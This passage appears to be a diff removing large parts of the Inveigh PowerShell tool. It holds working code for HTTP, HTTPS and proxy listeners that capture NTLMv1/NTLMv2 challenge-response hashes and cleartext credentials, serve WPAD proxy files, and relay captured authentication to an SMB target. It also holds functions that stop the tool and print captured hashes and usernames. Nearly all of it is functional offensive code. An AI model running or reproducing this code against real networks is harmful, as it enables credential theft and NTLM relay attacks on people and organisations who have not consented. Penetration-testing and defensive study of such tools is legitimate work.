- if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
- {
- $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
- }
-
- }
-
- }
- else # NTLMv2
- {
- $NTLM_type = "NTLMv2"
- $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
- $NTLM_response = $NTLM_response.Insert(32,':')
- $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response
-
- if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
- {
- $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash)
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
-
- if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
- {
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
- }
- else
- {
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
- }
-
- if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
- {
- $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
- $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
- }
-
- if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
- {
- $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
- }
-
- }
-
- }
-
- $HTTP_response_status_code = 0x32,0x30,0x30
- $HTTP_response_phrase = 0x4f,0x4b
- $HTTP_client_close = $true
- $NTLM_challenge = ""
-
- if($inveigh.SMB_relay -and $relay_step -eq 2)
- {
-
- if(!$Usernames -or $Usernames -contains $HTTP_NTLM_user_string -or $Usernames -contains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
- {
-
- if($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))
- {
-
- if($inveigh.SMBRelay_failed_list -notcontains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $Target")
- {
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")
- }
-
- $inveigh.console_queue.Add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")
- SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID
- $relay_step = 0
-
- }
- else
- {
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target")
- }
-
- $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target")
- $SMB_relay_socket.Close()
- $relay_step = 0
- }
-
- }
- else
- {
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")
- }
-
- $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_user_string appears to be a machine account")
- $SMB_relay_socket.Close()
- $relay_step = 0
- }
-
- }
- else
- {
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")
- }
-
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on SMB relay username list")
- $SMB_relay_socket.Close()
- $relay_step = 0
- }
-
- }
-
- if($proxy_listener)
- {
- $HTTP_send = $false
- }
-
- }
- else
- {
- $HTTP_client_close = $false
- }
-
- }
-
- if(!$proxy_listener -and $WPADResponse -and $HTTP_request_raw_URL -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
- {
- $HTTP_message = $WPADResponse
- $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig")
- }
-
- $HTTP_timestamp = Get-Date -format r
- $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
- $HTTP_header_content_length = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length)
- $HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
-
- if($HTTP_request_raw_URL -notmatch '/wpad.dat' -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$HTTP_client_close)
- {
- $HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
- }
-
- $packet_HTTPResponse = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_HTTPResponse.Add("HTTPResponse_RequestVersion",[Byte[]](0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20))
- $packet_HTTPResponse.Add("HTTPResponse_StatusCode",$HTTP_response_status_code + [Byte[]](0x20))
- $packet_HTTPResponse.Add("HTTPResponse_ResponsePhrase",$HTTP_response_phrase + [Byte[]](0x0d,0x0a))
- $packet_HTTPResponse.Add("HTTPResponse_Server",[Byte[]](0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a))
- $packet_HTTPResponse.Add("HTTPResponse_TimeStamp",[Byte[]](0x44,0x61,0x74,0x65,0x3a,0x20) + $HTTP_timestamp + [Byte[]](0x0d,0x0a))
- $packet_HTTPResponse.Add("HTTPResponse_ContentLength",$HTTP_header_content_length + [Byte[]](0x0d,0x0a))
-
- if($HTTP_header_authenticate -and $HTTP_header_authenticate_data)
- {
- $packet_HTTPResponse.Add("HTTPResponse_AuthenticateHeader",$HTTP_header_authenticate + $HTTP_header_authenticate_data + [Byte[]](0x0d,0x0a))
- }
-
- if($HTTP_header_content_type)
- {
- $packet_HTTPResponse.Add("HTTPResponse_ContentType",$HTTP_header_content_type + [Byte[]](0x0d,0x0a))
- }
-
- if($HTTP_header_cache_control)
- {
- $packet_HTTPResponse.Add("HTTPResponse_CacheControl",$HTTP_header_cache_control + [Byte[]](0x0d,0x0a))
- }
-
- if($HTTP_send)
- {
- $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes)
- $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse
- $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
- $HTTP_stream.Flush()
- }
-
- Start-Sleep -m 10
- $HTTP_request_raw_URL_old = $HTTP_request_raw_URL
- $HTTP_client_handle_old = $HTTP_client.Client.Handle
-
- if($HTTP_client_close)
- {
-
- if($proxy_listener)
- {
- $HTTP_client.Client.Close()
- }
- else
- {
- $HTTP_client.Close()
- }
-
- }
-
- }
- else
- {
-
- if($HTTP_data_available -or !$HTTP_reset_delay -or $HTTP_reset_delay_stopwatch.Elapsed -ge $HTTP_reset_delay_timeout)
- {
- $HTTP_client.Close()
- $HTTP_client_close = $true
- $HTTP_reset_delay = $false
- }
- else
- {
- Start-Sleep -m 100
- }
-
- }
-
- }
-
- $HTTP_client.Close()
- start-sleep -s 1
- $HTTP_listener.Server.blocking = $false
- Start-Sleep -s 1
- $HTTP_listener.Server.Close()
- Start-Sleep -s 1
- $HTTP_listener.Stop()
-}
-
-# Control Relay Loop ScriptBlock
-$control_relay_scriptblock =
-{
- param ($ConsoleQueueLimit,$RelayAutoExit,$RunTime)
-
- function StopInveigh
- {
- param ([String]$exit_message)
-
- if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
- {
-
- try
- {
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
-
- ForEach($certificate in $certificates)
- {
- $certificate_store.Remove($certificate)
- }
-
- $certificate_store.Close()
- }
- catch
- {
- $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
- }
-
- }
-
- }
-
- if($inveigh.running)
- {
- Start-Sleep -S 1
- $inveigh.console_queue.Add("Inveigh exited at $(Get-Date -format 's')")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
- }
-
- Start-Sleep -S 1
- $inveigh.running = $false
- }
-
- if($inveigh.relay_running)
- {
- Start-Sleep -S 1
- $inveigh.console_queue.Add("Inveigh Relay exited due to $exit_message at $(Get-Date -format 's')")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message")
- }
-
- Start-Sleep -S 1
- $inveigh.relay_running = $false
-
- }
-
- $inveigh.HTTPS = $false
- }
-
- if($RunTime)
- {
- $control_timeout = New-TimeSpan -Minutes $RunTime
- $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
- }
-
- while($inveigh.relay_running)
- {
-
- if($RelayAutoExit -eq 'Y' -and !$inveigh.SMB_relay)
- {
- Start-Sleep -S 5
- StopInveigh "disabled relay"
- }
-
- if($RunTime)
- {
-
- if($control_stopwatch.Elapsed -ge $control_timeout)
- {
- StopInveigh "run time"
- }
-
- }
-
- if($inveigh.file_output -and -not $inveigh.control)
- {
-
- while($inveigh.log_file_queue.Count -gt 0)
- {
- $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append
- $inveigh.log_file_queue.RemoveAt(0)
- }
-
- while($inveigh.NTLMv1_file_queue.Count -gt 0)
- {
- $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append
- $inveigh.NTLMv1_file_queue.RemoveAt(0)
- }
-
- while($inveigh.NTLMv2_file_queue.Count -gt 0)
- {
- $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append
- $inveigh.NTLMv2_file_queue.RemoveAt(0)
- }
-
- while($inveigh.cleartext_file_queue.Count -gt 0)
- {
- $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
- $inveigh.cleartext_file_queue.RemoveAt(0)
- }
-
- while($inveigh.form_input_file_queue.Count -gt 0)
- {
- $inveigh.form_input_file_queue[0]|Out-File $inveigh.form_input_out_file -Append
- $inveigh.form_input_file_queue.RemoveAt(0)
- }
-
- }
-
- if(!$inveigh.console_output -and $ConsoleQueueLimit -ge 0)
- {
-
- while($inveigh.console_queue.Count -gt $ConsoleQueueLimit -and !$inveigh.console_output)
- {
- $inveigh.console_queue.RemoveAt(0)
- }
-
- }
-
- Start-Sleep -m 5
- }
-
- }
-
-# HTTP Listener Startup Function
-function HTTPListener()
-{
- $HTTPS_listener = $false
- $proxy_listener = $false
- $HTTP_runspace = [RunspaceFactory]::CreateRunspace()
- $HTTP_runspace.Open()
- $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
- $HTTP_powershell = [PowerShell]::Create()
- $HTTP_powershell.Runspace = $HTTP_runspace
- $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $HTTP_powershell.AddScript($irkin_functions_scriptblock) > $null
- $HTTP_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null
- $HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null
- $HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
- $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
- $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
- $HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPResetDelay).AddArgument(
- $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
- $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
- $Service).AddArgument($SMB_version).AddArgument($Target).AddArgument($Usernames).AddArgument(
- $WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null
- $HTTP_powershell.BeginInvoke() > $null
-}
-
-Start-Sleep -m 50
-
-# HTTPS Listener Startup Function
-function HTTPSListener()
-{
- $HTTPS_listener = $true
- $proxy_listener = $false
- $HTTPS_runspace = [RunspaceFactory]::CreateRunspace()
- $HTTPS_runspace.Open()
- $HTTPS_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
- $HTTPS_powershell = [PowerShell]::Create()
- $HTTPS_powershell.Runspace = $HTTPS_runspace
- $HTTPS_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $HTTPS_powershell.AddScript($irkin_functions_scriptblock) > $null
- $HTTPS_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null
- $HTTPS_powershell.AddScript($SMB_relay_response_scriptblock) > $null
- $HTTPS_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
- $HTTPS_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
- $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
- $HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPResetDelay).AddArgument(
- $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
- $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
- $Service).AddArgument($SMB_version).AddArgument($Target).AddArgument($Usernames).AddArgument(
- $WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null
- $HTTPS_powershell.BeginInvoke() > $null
-}
-
-Start-Sleep -m 50
-
-# Proxy Listener Startup Function
-function ProxyListener()
-{
- $HTTPS_listener = $false
- $proxy_listener = $true
- $proxy_runspace = [RunspaceFactory]::CreateRunspace()
- $proxy_runspace.Open()
- $proxy_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
- $proxy_powershell = [PowerShell]::Create()
- $proxy_powershell.Runspace = $proxy_runspace
- $proxy_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $proxy_powershell.AddScript($irkin_functions_scriptblock) > $null
- $proxy_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null
- $proxy_powershell.AddScript($SMB_relay_response_scriptblock) > $null
- $proxy_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
- $proxy_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
- $proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
- $ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPResetDelay).AddArgument(
- $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
- $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
- $Service).AddArgument($SMB_version).AddArgument($Target).AddArgument($Usernames).AddArgument(
- $WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null
- $proxy_powershell.BeginInvoke() > $null
-}
-
-# Control Relay Startup Function
-function ControlRelayLoop()
-{
- $control_relay_runspace = [RunspaceFactory]::CreateRunspace()
- $control_relay_runspace.Open()
- $control_relay_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
- $control_relay_powershell = [PowerShell]::Create()
- $control_relay_powershell.Runspace = $control_relay_runspace
- $control_relay_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $control_relay_powershell.AddScript($control_relay_scriptblock).AddArgument($ConsoleQueueLimit).AddArgument(
- $RelayAutoExit).AddArgument($RunTime) > $null
- $control_relay_powershell.BeginInvoke() > $null
-}
-
-# HTTP Server Start
-if($HTTP -eq 'Y')
-{
- HTTPListener
-}
-
-# HTTPS Server Start
-if($HTTPS -eq 'Y')
-{
- HTTPSListener
-}
-
-# Proxy Server Start
-if($Proxy -eq 'Y')
-{
- ProxyListener
-}
-
-# Control Relay Loop Start
-if($ConsoleQueueLimit -ge 0 -or $inveigh.file_output -or $RelayAutoExit -or $RunTime)
-{
- ControlRelayLoop
-}
-
-# Console Output Loop
-try
-{
-
- if($inveigh.console_output)
- {
-
- if($ConsoleStatus)
- {
- $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus
- $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
- }
-
- :console_loop while($inveigh.relay_running -and $inveigh.console_output)
- {
-
- while($inveigh.console_queue.Count -gt 0)
- {
-
- switch -wildcard ($inveigh.console_queue[0])
- {
-
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
- {
-
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Warning($inveigh.console_queue[0])
- }
-
- $inveigh.console_queue.RemoveAt(0)
- }
-
- {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
- {
-
- if($ConsoleOutput -eq 'Y')
- {
-
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Output($inveigh.console_queue[0])
- }
-
- }
-
- $inveigh.console_queue.RemoveAt(0)
-
- }
-
- {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
- {
-
- if($ConsoleOutput -ne "Low")
- {
-
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Output($inveigh.console_queue[0])
- }
-
- }
-
- $inveigh.console_queue.RemoveAt(0)
-
- }
-
- default
- {
-
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Output($inveigh.console_queue[0])
- }
-
- $inveigh.console_queue.RemoveAt(0)
- }
-
- }
-
- }
-
- if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout)
- {
-
- if($inveigh.cleartext_list.Count -gt 0)
- {
- Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline)
- $inveigh.cleartext_list.Sort()
-
- foreach($unique_cleartext in $inveigh.cleartext_list)
- {
- if($unique_cleartext -ne $unique_cleartext_last)
- {
- Write-Output($unique_cleartext + $inveigh.newline)
- }
-
- $unique_cleartext_last = $unique_cleartext
- }
-
- Start-Sleep -m 5
- }
- else
- {
- Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline)
- }
-
- if($inveigh.NTLMv1_list.Count -gt 0)
- {
- Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
- $inveigh.NTLMv1_list.Sort()
-
- foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
- {
- $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
-
- if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
- {
- Write-Output($unique_NTLMv1 + $inveigh.newline)
- }
-
- $unique_NTLMv1_account_last = $unique_NTLMv1_account
- }
-
- $unique_NTLMv1_account_last = ''
- Start-Sleep -m 5
- Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
-
- foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)
- {
- Write-Output($NTLMv1_username + $inveigh.newline)
- }
-
- Start-Sleep -m 5
- }
- else
- {
- Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
- }
-
- if($inveigh.NTLMv2_list.Count -gt 0)
- {
- Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
- $inveigh.NTLMv2_list.Sort()
-
- foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
- {
- $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
-
- if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
- {
- Write-Output($unique_NTLMv2 + $inveigh.newline)
- }
-
- $unique_NTLMv2_account_last = $unique_NTLMv2_account
- }
-
- $unique_NTLMv2_account_last = ''
- Start-Sleep -m 5
- Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
-
- foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)
- {
- Write-Output($NTLMv2_username + $inveigh.newline)
- }
-
- }
- else
- {
- Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
- }
-
- $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
-
- }
-
- if($inveigh.console_input)
- {
-
- if([Console]::KeyAvailable)
- {
- $inveigh.console_output = $false
- BREAK console_loop
- }
-
- }
-
- Start-Sleep -m 5
- }
-
- }
-
-}
-finally
-{
-
- if($Tool -eq 2)
- {
- $inveigh.relay_running = $false
- }
-
-}
-
-}
-#End Invoke-InveighRelay
-
-function Stop-Inveigh
-{
-<#
-.SYNOPSIS
-Stop-Inveigh will stop all running Inveigh functions.
-#>
-
-if($inveigh)
-{
-
- if($inveigh.running -or $inveigh.relay_running)
- {
-
- if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
- {
-
- try
- {
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
-
- ForEach($certificate in $certificates)
- {
- $certificate_store.Remove($certificate)
- }
-
- $certificate_store.Close()
- }
- catch
- {
- Write-Output("SSL Certificate Deletion Error - Remove Manually")
-
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
- }
-
- }
-
- }
-
- if($inveigh.relay_running)
- {
-
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
- }
-
- Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
- $inveigh.relay_running = $false
-
- }
-
- if($inveigh.running)
- {
-
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
- }
-
- Write-Output("Inveigh exited at $(Get-Date -format 's')")
- $inveigh.running = $false
-
- }
-
- $inveigh.HTTPS = $false
- Start-Sleep -S 5
- }
- else
- {
- Write-Output("There are no running Inveigh functions")
- }
-
-}
-
-}
-
-function Get-Inveigh
-{
-<#
-.SYNOPSIS
-Get-Inveigh will get stored Inveigh data from memory.
-
-.PARAMETER Console
-Get queued console output. This is also the default if no parameters are set.
-
-.PARAMETER Learning
-Get valid hosts discovered through spoofer learning.
-
-.PARAMETER Log
-Get log entries.
-
-.PARAMETER Cleartext
-Get captured cleartext credentials.
-
-.PARAMETER CleartextUnique
-Get unique captured cleartext credentials.
-
-.PARAMETER NTLMv1
-Get captured NTLMv1 challenge/response hashes.
-
-.PARAMETER NTLMv1Unique
-Get the first captured NTLMv1 challenge/response for each unique account.
-
-.PARAMETER NTLMv1Usernames
-Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
-
-.PARAMETER NTLMv2
-Get captured NTLMv1 challenge/response hashes.
-
-.PARAMETER NTLMv2Unique
-Get the first captured NTLMv2 challenge/response for each unique account.
-
-.PARAMETER NTLMv2Usernames
-Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
-
-.PARAMETER POSTRequest
-Get captured POST requests.
-
-.PARAMETER POSTRequestUnique
-Get unique captured POST request.
-#>
-
-[CmdletBinding()]
-param
-(
- [parameter(Mandatory=$false)][Switch]$Cleartext,
- [parameter(Mandatory=$false)][Switch]$CleartextUnique,
- [parameter(Mandatory=$false)][Switch]$Console,
- [parameter(Mandatory=$false)][Switch]$Learning,
- [parameter(Mandatory=$false)][Switch]$Log,
- [parameter(Mandatory=$false)][Switch]$NTLMv1,
- [parameter(Mandatory=$false)][Switch]$NTLMv2,
- [parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
- [parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
- [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
- [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
- [parameter(Mandatory=$false)][Switch]$POSTRequest,
- [parameter(Mandatory=$false)][Switch]$POSTRequestUnique,
- [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-
-if($Console -or $PSBoundParameters.Count -eq 0)
-{
-
- while($inveigh.console_queue.Count -gt 0)
- {
-
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveAt(0)
- }
- else
- {
-
- switch -wildcard ($inveigh.console_queue[0])
- {
-
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- default
- {
- Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- }
-
- }
-
- }
-
-}
-
-if($Log)
-{
- Write-Output $inveigh.log
-}
-
-if($NTLMv1)
-{
- Write-Output $inveigh.NTLMv1_list
-}
-
-if($NTLMv1Unique)
-{
- $inveigh.NTLMv1_list.Sort()
-
- foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
- {
- $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
-
- if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
- {
- Write-Output $unique_NTLMv1
- }
-
- $unique_NTLMv1_account_last = $unique_NTLMv1_account
- }
-
-}
-
-if($NTLMv1Usernames)
-{
- Write-Output $inveigh.NTLMv2_username_list
-}
-
-if($NTLMv2)
-{
